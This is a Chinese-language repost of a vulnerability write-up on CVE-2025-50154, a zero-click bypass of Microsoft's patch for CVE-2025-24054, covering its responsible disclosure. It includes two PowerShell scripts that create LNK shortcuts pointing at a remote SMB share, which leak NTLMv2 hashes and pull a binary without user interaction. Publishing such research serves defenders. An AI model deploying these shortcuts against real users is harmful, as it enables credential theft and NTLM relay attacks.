文章总结: 研究人员发现CVE-2025-50154漏洞可绕过微软针对CVE-2025-24054的补丁,实现零点击NTLM凭据泄露。通过修改LNK文件,攻击者可在无需用户交互的情况下提取NTLM哈希值并静默下载远程二进制文件,即使在已修补系统上。这可能导致权限提升、横向移动和远程代码执行,强调了彻底补丁验证和纵深防御策略的重要性。
综合评分: 88
文章分类: 漏洞分析,渗透测试,网络安全
零点击,一个 NTLM:Microsoft 安全补丁绕过(CVE-2025-50154)
Ots安全
2025年8月13日 13:56
广东
执行摘要
作为 Cymulate 研究实验室正在进行的安全研究的一部分,我发现了一个零点击 NTLM 凭据泄露漏洞,该漏洞可以绕过微软针对CVE-2025-24054的补丁。原始漏洞演示了特制请求如何触发 NTLM 身份验证并泄露敏感凭据。微软已通过安全更新修复了该漏洞,但我们的测试表明该修复并不完整。
此漏洞现已被编号为 CVE-2025-50154,允许攻击者在无需任何用户交互的情况下提取 NTLM 哈希值,即使在已完全修补的系统上也是如此。通过利用缓解措施中留下的细微漏洞,攻击者可以自动触发 NTLM 身份验证请求,从而实现离线破解或中继攻击,从而获得未经授权的访问。
风险巨大:NTLM 中继攻击可能导致权限提升、横向移动和远程代码执行 (RCE),尤其是在针对高价值账户时。由于此漏洞无需任何用户交互,因此对于仅依赖微软 4 月补丁进行防护的组织来说,它增加了攻击面。
我们负责任地向微软安全响应中心 (MSRC) 披露了我们的发现,该漏洞已获得官方认可,并拥有自己的 CVE 编号。新的安全更新预计将全面解决该问题。
介绍
NTLM 是新技术局域网管理器 (New Technology LAN Manager) 的缩写,是微软的身份验证协议系列,用于确认用户身份并保护网络通信。它通过客户端-服务器直接的“质询/响应”流程工作,服务器发出质询,客户端证明其身份,而无需在网络上传输实际密码。
虽然 NTLMv2 可以防御彩虹表和哈希传递等预计算攻击,但捕获的哈希仍然可能被利用。攻击者可能会尝试强制离线攻击,或使用中继攻击(一种中间人攻击方法),将窃取的哈希传递给其他服务,以用户身份登录。如果被入侵的帐户拥有更高的权限,这可能会迅速导致权限提升和网络横向移动。
事实上,Check Point 发布了一篇博客,详细介绍了 CVE-2025-24054。然而,即使在微软发布了针对该问题的补丁之后,我们仍然找到了绕过该漏洞并获取 NTLM 哈希值的方法,这证明该威胁并未完全消除。
旧漏洞
为了重现漏洞的状态,我安装了未修补的 Windows 10 VM,没有任何安全更新。
我启动了一个 SMB 服务器来监听传入的 SMB 连接,并使用 Wireshark 嗅探器来分析客户端在基于 ICO 文件披露哈希值时的行为。
$shortcutPath = "C:\Users\Cymuser\Desktop\LAB\lab.lnk"
$targetPath = "C:\Windows\System32\notepad.exe"
$iconLocation = "\\192.168.159.129\share\icon.ico"
# Create a WScript.Shell COM object
$wShell = New-Object -ComObject WScript.Shell
$shortcut = $wShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.IconLocation = $iconLocation
$shortcut.Save()
Write-Output "Shortcut created at: $shortcutPath"
它将创建一个带有远程 SMB 图标的 LNK。运行它,通过查看资源管理器中的图标,我们将获得当前正在运行的用户打开 explorer.exe 进程的 NTLMv2-SSP 哈希值。
哈希:
在已修补的环境中,Windows 已进行安全更新以防止这种情况发生。我在另一台已修补的 Windows 10 VM 中进行了相同的测试:
运行相同的脚本,没有检索到图标:
我们可以看到,与之前的情况相反,图标并没有被渲染,而且也没有泄露任何哈希值。
绕过漏洞
必须更改脚本以使图标成为默认图标(shell32.dll)并且使可执行值成为距离检索到的文件路径。
$shortcutPath = "C:\Users\Cymuser\Desktop\LAB\lab.lnk"
$targetPath = "\\192.168.159.129\share\execute.exe"
$iconLocation = "C:\Windows\System32\SHELL32.dll"
$wShell = New-Object -ComObject WScript.Shell
$shortcut = $wShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.IconLocation = $iconLocation
$shortcut.Save()
Write-Output "Shortcut created at: $shortcutPath"
工作原理
例如,当查看 Chrome 等程序的桌面快捷方式时,即使未配置 IconLocation ,也会呈现图标。
explorer.exe 进程直接从RT_ICON和RT_GROUP_ICON标头中的.rsrc部分检索它。
该补丁重点是防止快捷方式根据 UNC 路径呈现图标,但它不适用于在文件本身内存储自己的图标数据的远程二进制文件。
执行脚本:
无需点击,explorer.exe 进程不仅会检索 .rsrc 部分,还会检索整个二进制文件,以检索图标。
NTLMv2-SSP 哈希披露:
此外,整个二进制文件无需任何点击即可传输,如 Wireshark 所示:
该文件无需点击即可自动下载。虽然文件不会立即执行,但此行为仍然很危险,因为它允许攻击者在未经同意的情况下直接向受害者的系统发送恶意负载。由于此阶段没有进程执行,许多安全工具可能会忽略该活动,从而使该文件无法被检测到。
一旦进入系统,该二进制文件便可在稍后触发,使攻击者能够部署恶意软件、窃取凭证或在网络中横向移动。即使不是立即执行,以这种方式部署恶意二进制文件的能力也构成了严重的风险,因为它为更高级、更具破坏性的攻击奠定了基础。
该文件被检索,如 Wireshark 导出所示:
从 sysinternals procmon 监控中,创建了该文件:
二进制大小分配如下:
结论
此漏洞凸显了安全补丁中看似微小的漏洞也可能使系统面临严重威胁。绕过 CVE-2025-24054 的修复程序,不仅可以在零点击场景下泄露 NTLM 哈希值,还可以在无需用户交互的情况下静默下载远程二进制文件。虽然这些二进制文件不会立即执行,但它们在目标系统上的存在为攻击者提供了立足点,以便日后发动更具破坏性的攻击,例如凭证窃取、勒索软件部署或横向移动。
凭证泄露和隐秘有效载荷投递的结合,表明攻击者能够将多个漏洞串联成一条强大的攻击路径。这再次凸显了彻底的补丁验证、纵深防御策略以及持续安全测试的必要性,即使针对的是供应商认为已修复的漏洞。
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Ots安全 《零点击,一个 NTLM:Microsoft 安全补丁绕过(CVE-2025-50154)》